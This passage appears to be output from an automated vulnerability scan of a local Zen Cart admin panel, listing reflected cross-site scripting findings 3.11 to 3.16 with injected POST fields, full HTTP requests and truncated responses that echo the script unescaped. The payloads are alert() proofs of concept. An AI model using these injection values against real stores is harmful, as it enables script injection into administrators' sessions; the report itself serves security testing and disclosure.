Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------19864573418301
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------19864573418301
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------19864573418301
Content-Disposition: form-data; name="image_delete"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="overwrite"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_image_manual"

>"><script>alert(14405309.33977)</script>
-----------------------------19864573418301
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------19864573418301
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------19864573418301
Content-Disposition: form-data; name="products_weight"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------19864573418301--



HTTP Response 
ger</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/media_types.php">Media Types</a></li>
              </ul>
    </li>
      </ul>
</div>
<!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="2" cellpadding="2">
  <tr>
<!-- body_text //-->
    <td width="100%" valign="top">
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/testval/images/25" border="0" alt="admin" title=" admin ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/3ds/>"><script>alert(14405309.33977)</script>" border="0" alt="3ds/>"><script>alert(14405309.33977)</script>" title=" 3ds/>"><script>alert(14405309.33977)</script> " width="100" height="80" align="right" hspace="5" vspace="5">Default text        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://http://www.kelev.biz" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspa



Finding 3.11:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: products_url[2]
Injection value: >"><script>alert(14405309.34147)</script>
Detection value: alert(14405309.34147)

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product_preview HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------19864573418301
Content-Length: 4870

-----------------------------19864573418301
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------19864573418301
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------19864573418301
Content-Disposition: form-data; name="x"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="y"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="master_category"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------19864573418301
Content-Disposition: form-data; name="products_status"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------19864573418301
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------19864573418301
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------19864573418301
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_price"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------19864573418301
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------19864573418301
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------19864573418301
Content-Disposition: form-data; name="products_model"

testval
-----------------------------19864573418301
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------19864573418301
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------19864573418301
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------19864573418301
Content-Disposition: form-data; name="image_delete"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="overwrite"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------19864573418301
Content-Disposition: form-data; name="products_url[2]"

>"><script>alert(14405309.34147)</script>
-----------------------------19864573418301
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------19864573418301
Content-Disposition: form-data; name="products_weight"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------19864573418301--



HTTP Response 
----Truncated due to large size ---

h="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/testval/images/25" border="0" alt="admin" title=" admin ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/3ds/25" border="0" alt="3ds/25" title=" 3ds/25 " width="100" height="80" align="right" hspace="5" vspace="5">Default text        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://>"><script>alert(14405309.34147)</script>" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/english/images/icon.gif" border="0" alt="English" title=" English ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      

Finding 3.12:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: products_url[1]
Injection value: >"><script>alert(14405309.34207)</script>
Detection value: alert(14405309.34207)

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product_preview HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------19864573418301
Content-Length: 4870

-----------------------------19864573418301
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------19864573418301
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------19864573418301
Content-Disposition: form-data; name="x"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="y"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="master_category"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------19864573418301
Content-Disposition: form-data; name="products_status"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------19864573418301
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------19864573418301
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------19864573418301
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_price"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------19864573418301
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------19864573418301
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------19864573418301
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------19864573418301
Content-Disposition: form-data; name="products_model"

testval
-----------------------------19864573418301
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------19864573418301
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------19864573418301
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------19864573418301
Content-Disposition: form-data; name="image_delete"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="overwrite"

1
-----------------------------19864573418301
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------19864573418301
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------19864573418301
Content-Disposition: form-data; name="products_url[1]"

>"><script>alert(14405309.34207)</script>
-----------------------------19864573418301
Content-Disposition: form-data; name="products_weight"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------19864573418301
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------19864573418301--



HTTP Response
----Truncated due to large size ---
 
"100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/english/images/icon.gif" border="0" alt="English" title=" English ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/3ds/25" border="0" alt="3ds/25" title=" 3ds/25 " width="100" height="80" align="right" hspace="5" vspace="5">test        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://>"><script>alert(14405309.34207)</script>" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
<form name="update_product" action="http://localhost:8081/zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=update_product" method="post" enctype="multipart/form-data"><input type="hidden" name="securityToken" value="9adbdf7813e8bda76f1aa498b0b5f4ea" />      <tr>
        <td align="right" class="smallText">
<input type="hidden" name="securityToken" value="9adbdf7813e8bda76f1aa498b0b5f4ea" /><input type="hidden" name="products_date_added" value="2015-08-25 18:43:21" /><input type="hidden" name="x" value="0" /><input type="hidden" name="y" value="0" /><input type="h


Finding 3.13:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: products_name[1]
Injection value: <script>alert(14405309.38717)</script>
Detection value: <script>alert(14405309.38717)</script>

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=update_product HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=2&product_type=1&pID=2&action=new_product_preview&vcheck=yes
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------247302997218101
Content-Length: 987

-----------------------------247302997218101
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------247302997218101
Content-Disposition: form-data; name="products_name[2]"


-----------------------------247302997218101
Content-Disposition: form-data; name="products_description[2]"


-----------------------------247302997218101
Content-Disposition: form-data; name="products_url[2]"


-----------------------------247302997218101
Content-Disposition: form-data; name="products_name[1]"

<script>alert(14405309.38717)</script>
-----------------------------247302997218101
Content-Disposition: form-data; name="products_description[1]"


-----------------------------247302997218101
Content-Disposition: form-data; name="products_url[1]"


-----------------------------247302997218101
Content-Disposition: form-data; name="products_image"

3ds/25
-----------------------------247302997218101--



HTTP Response
----Truncated due to large size ---
 
2"><img src="images/icon_products_price_manager.gif" border="0" alt="Products Price Manager" title=" Products Price Manager "></a> <a href="http://localhost:8081/zen-cart/admin1/25.php?page=1&product_type=2&cPath=2&pID=4&action=new_product_meta_tags"><img src="images/icon_edit_metatags_off.gif" border="0" alt="Meta Tags Undefined" title=" Meta Tags Undefined "></a>
                </td>
              </tr>
              <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/product.php?page=1&product_type=1&cPath=2&pID=2&action=new_product'">
                <td class="dataTableContent" width="20" align="right">2</td>
                <td class="dataTableContent"><a href="http://localhost:8081/zen-cart/admin1/product.php?cPath=2&pID=2&action=new_product_preview&read=only&product_type=1&page=1"><img src="images/icons/preview.gif" border="0" alt="Preview" title=" Preview "></a>&nbsp;<script>alert(14405309.38717)</script></td>
                <td class="dataTableContent"></td>
                <td colspan="2" class="dataTableContent" align="right"></td>
                <td class="dataTableContent" align="right">0</td>
                <td class="dataTableContent" width="50" align="left">
<form name="setflag_products" action="http://localhost:8081/zen-cart/admin1/categories.php?action=setflag&pID=2&cPath=2&page=1" method="post"><input type="hidden" name="securityToken" value="9adbdf7813e8bda76f1aa498b0b5f4ea" />        <input type="image" src="images/icon_red_on.gif" title="Status - Disabled"/>
        <input type="hidden" name="flag" value="1" />
        </form>
&nbsp;&nbsp;<img src="images/icon_yellow_on.gif" border="0" alt="Product is Linked" title=" Product is Linked "><br>                </td>
                <td class="dataTableContent" align="right">0</td>
                <td class="dataTableContent" align="right">
        <a href="http://localhost:8081/zen-cart/admin1/product.php?cPath=2&product_t


Finding 3.14:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: current_master_categories_id
Injection value: <script>alert(14405309.96737)</script>
Detection value: <script>alert(14405309.96737)</script>

HTTP Request 

POST /zen-cart/admin1/products_to_categories.php?action=update_product&products_filter=3&current_category_id=2 HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/products_to_categories.php?&products_filter=3
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: application/x-www-form-urlencoded
Content-Length: 137

securityToken=9adbdf7813e8bda76f1aa498b0b5f4ea&current_master_categories_id=<script>alert(14405309.96737)</script>&categories_add%5B%5D=1


HTTP Response 
HTTP/1.1 200 OK 
Date: Tue, 25 Aug 2015 20:51:36 GMT 
Server: Apache X-Powered-By: PHP/5.4.37 
Expires: Thu, 19 Nov 1981 08:52:00 GMT 
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 
Vary: User-Agent 
Content-Length: 58 Keep-Alive: timeout=5, max=96 
Connection: Keep-Alive 
Content-Type: text/html; charset=utf-8 
I WOULD NOT ADD <script>alert(14405309.96737)</script><br> 

Finding 3.15:  Cross-Site Scripting. This is a reflected XSS vulnerability, detected in an alert that was an immediate response to the injection.

Injected item: POST: products_description[2]
Injection value: <script>alert(14405309.41217)</script>
Detection value: <script>alert(14405309.41217)</script>

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product_preview&search=test HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product&search=test
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------28667138731706
Content-Length: 4975

-----------------------------28667138731706
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------28667138731706
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------28667138731706
Content-Disposition: form-data; name="x"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="y"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="master_category"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------28667138731706
Content-Disposition: form-data; name="products_status"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------28667138731706
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------28667138731706
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------28667138731706
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_price"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------28667138731706
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_description[2]"

<script>alert(14405309.41217)</script>
-----------------------------28667138731706
Content-Disposition: form-data; name="products_description[1]"

test
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------28667138731706
Content-Disposition: form-data; name="products_model"

testval
-----------------------------28667138731706
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------28667138731706
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------28667138731706
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------28667138731706
Content-Disposition: form-data; name="image_delete"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="overwrite"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------28667138731706
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------28667138731706
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------28667138731706
Content-Disposition: form-data; name="products_weight"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------28667138731706
Content-Disposition: form-data; name="search"

test
-----------------------------28667138731706--



HTTP Response
----Truncated due to large size ---
 
pes</a></li>
              </ul>
    </li>
      </ul>
</div>
<!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="2" cellpadding="2">
  <tr>
<!-- body_text //-->
    <td width="100%" valign="top">
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/testval/images/25" border="0" alt="admin" title=" admin ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">
          <img src="http://localhost:8081/zen-cart/images/3ds/25" border="0" alt="3ds/25" title=" 3ds/25 " width="100" height="80" align="right" hspace="5" vspace="5"><script>alert(14405309.41217)</script>        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td class="main">For more information, please visit this products <a href="http://http://www.kelev.biz" target="blank">webpage</a>.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
      <tr>
        <td align="center" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/english/images/icon.gif" border="0" alt="English" title=


Finding 3.16:  Cross-Site Scripting. This is a reflected XSS vulnerability, 
detected in an alert that was an immediate response to the injection.

Injected item: POST: products_description[1]
Injection value: <script>alert(14405309.41407)</script>
Detection value: <script>alert(14405309.41407)</script>

HTTP Request 

POST /zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product_preview&search=test HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/product.php?cPath=1&product_type=1&pID=2&action=new_product&search=test
Cookie: zenAdminID=v1rn6j22v0e0dj3e010dukn5t4
Content-Type: multipart/form-data; boundary=---------------------------28667138731706
Content-Length: 4983

-----------------------------28667138731706
Content-Disposition: form-data; name="securityToken"

9adbdf7813e8bda76f1aa498b0b5f4ea
-----------------------------28667138731706
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------28667138731706
Content-Disposition: form-data; name="x"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="y"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="master_category"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="master_categories_id"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_discount_type"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_discount_type_from"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_price_sorter"

12.0000
-----------------------------28667138731706
Content-Disposition: form-data; name="products_status"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_date_available"

08/25/2015
-----------------------------28667138731706
Content-Disposition: form-data; name="manufacturers_id"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_name[2]"

admin
-----------------------------28667138731706
Content-Disposition: form-data; name="products_name[1]"

admin
-----------------------------28667138731706
Content-Disposition: form-data; name="product_is_free"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="product_is_call"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_priced_by_attribute"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_tax_class_id"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_price"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_price_gross"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_virtual"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="product_is_always_free_shipping"

2
-----------------------------28667138731706
Content-Disposition: form-data; name="products_qty_box_status"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity_order_min"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity_order_max"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity_order_units"

12
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity_mixed"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_description[2]"

Default text
-----------------------------28667138731706
Content-Disposition: form-data; name="products_description[1]"

<script>alert(14405309.41407)</script>
-----------------------------28667138731706
Content-Disposition: form-data; name="products_quantity"

1222111
-----------------------------28667138731706
Content-Disposition: form-data; name="products_model"

testval
-----------------------------28667138731706
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


-----------------------------28667138731706
Content-Disposition: form-data; name="products_previous_image"

3ds/25
-----------------------------28667138731706
Content-Disposition: form-data; name="img_dir"

3ds/
-----------------------------28667138731706
Content-Disposition: form-data; name="image_delete"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="overwrite"

1
-----------------------------28667138731706
Content-Disposition: form-data; name="products_image_manual"

25
-----------------------------28667138731706
Content-Disposition: form-data; name="products_url[2]"

http://www.kelev.biz
-----------------------------28667138731706
Content-Disposition: form-data; name="products_url[1]"

http://www.kelev.biz
-----------------------------28667138731706
Content-Disposition: form-data; name="products_weight"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_sort_order"

0
-----------------------------28667138731706
Content-Disposition: form-data; name="products_date_added"

2015-08-25 18:43:21
-----------------------------28667138731706
Content-Disposition: form-data; name="search"

test
-----------------------------28667138731706--



HTTP Response
----Truncated due to large size ---
 
" class="smallText">This product was added to our catalog on Tuesday 25 August, 2015.</td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="1" height="10"></td>
      </tr>
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading"><img src="http://localhost:8081/zen-cart/includes/languages/english/images/icon.gif" border="0" alt="English" title=" English ">&nbsp;admin</td>
            <td class="pageHeading" align="right">$12.00</td>
          </tr>
